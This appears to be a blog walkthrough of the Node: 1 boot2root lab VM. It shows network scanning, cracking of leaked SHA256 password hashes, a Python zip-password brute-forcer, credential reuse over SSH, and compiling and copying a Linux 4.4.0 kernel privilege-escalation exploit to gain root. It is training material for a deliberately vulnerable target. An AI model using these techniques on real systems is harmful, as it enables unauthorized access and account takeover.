Tovi Jaeschke

Links:

Recent posts:

Node: 1 boot2root walkthrough

Walkthrough for the Node: 1 CTF, that was originaly created for HackTheBox, and then uploaded to vulnhub.com

Scanning & Recon

I start by performing a scan with netdiscover, to find the ip address of the target.


netdiscover -r 10.1.1.1/24
Currently scanning: Finished!   |   Screen View: Unique Hosts

15 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 900
_____________________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.1.1.84       08:00:27:a2:8a:95      2     120  PCS Systemtechnik GmbH

I immediately see that the ip address is 10.1.1.84, due to the vendor name of the network interface. From past experience, I know that is virtualbox interface. I tried opening the address in my browser, but the connection timed out. Lets see what ports Node does have open.

nmap -p- -sV -oN nmap_Node.txt 10.1.1.84
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-18 14:53 ACDT
Nmap scan report for 10.1.1.84
Host is up (0.00042s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
3000/tcp open  http    Node.js Express framework
MAC Address: 08:00:27:A2:8A:95 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 116.00 seconds

So now we know ssh is open, and there is a Node.js server on port 3000. I had a poke around the website, titled "MyPlace", read the source, and attempted to read robots.txt, but that would just redirect me to the index. I found the path /api/admin/backup in the javascript code which was a json api with a single entry authenticated: false, but that doesnt help me much. It does mean there is an admin page though. I tried to scan for directories with dirb and dirsearch, but neither could find any due to the webserver redirecting all 404 codes to the index page. Next, I opened up burpsuite and spidered the host. I instantly found something that peaked my interest.

A json file with the usernames and passwords of all the users. I used hash-identifier to check what type of hash was used on the passwords, which was sha256, I then proceeded to try to brute force the admin password with john the ripper, which cracked 3 our of the 4 passwords almost instantly.


cat ~/.john/john.pot
$SHA256$de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73:snowflake
$SHA256$f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240:spongebob
$SHA256$dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af:manchester

After cracking the passwords, I realized that one of the password hashes corresponded to the user myPl4ceAdminAcc0unt, so I used those credentials to log in. The admin page had a single button that prompted me to download a backup of the site, which I did. After a lot of research, I found the backup was a base64 encoded, password protected zip file. I decoded the zip file, and wrote a quick python script to crack the zip file.


#!/usr/bin/env python3
import zipfile

def main(file_path, word_list):
	try:
		zip_ = zipfile.ZipFile(file_path)
	except:
		print("Please check the file's path. It doesn't seem to be a zip file.")
		exit(1)

	password = None
	with open(word_list, "r", encoding="ISO-8859-1") as f:
		passes = f.readlines()
		for x in passes:
			password = x.split("\n")[0]
			try:
				zip_.extractall(pwd=str.encode(password))
				print("\nPassword cracked: {}\n".format(password))
				exit(0)
			except Exception as err:
				pass
			print("Sorry, password not found.")

if __name__ == '__main__':
	main("myplace.zip", "/usr/share/wordlists/rockyou.txt")


./zipCrack.py
Password cracked: magicword

After cracking the password, I read through some of the files, and found a mongodb url containing the password for the user mark.

SSH Shell

So I tried that as ssh credentials, and it worked After a long few hours of looking through cron file, config files, looking for writable SUID binaries, and running unix-privesc-check and Linux_Exploit_Suggester, I finally found a privilege escalation script with searchsploit.

Root Access


searchsploit linux 4.4.0
--------------------------------------------------------------------------------------------------------------------- -------------------------------------
 Exploit Title                                                                                                       |  Path
                                                                                                                     | (/opt/exploit-database/)
--------------------------------------------------------------------------------------------------------------------- -------------------------------------
Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation (Metasploit)                                    | exploits/linux/local/44696.rb
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation                     | exploits/linux_x86-64/local/40871.c
Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free (PoC)                                                                 | exploits/linux/dos/41457.c
Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation                                                  | exploits/linux/local/41458.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation                | exploits/linux_x86-64/local/40049.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation                                               | exploits/linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation                    | exploits/linux/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)                | exploits/linux/local/43418.c
--------------------------------------------------------------------------------------------------------------------- -------------------------------------
Shellcodes: No Result
cp /opt/exploit-database/exploits/linux/local/44298.c .
gcc -o lpe 44298.c
scp lpe mark@10.1.1.84:/tmp
mark@10.1.1.84's password:
lpe                                                                                                                          100%   17KB   8.6MB/s   00:00

Which I then ran on the target, which got me a root shell

Conclusion

Node: 1 definately had an intermediate level of difficulty. There were a few times I got a little tripped up and went down the wrong rabbit hole. All in all though, it was a fun box to own, and really shows how one misconfiguration, and a slightly outdated system, can lead to a very vulnerable system.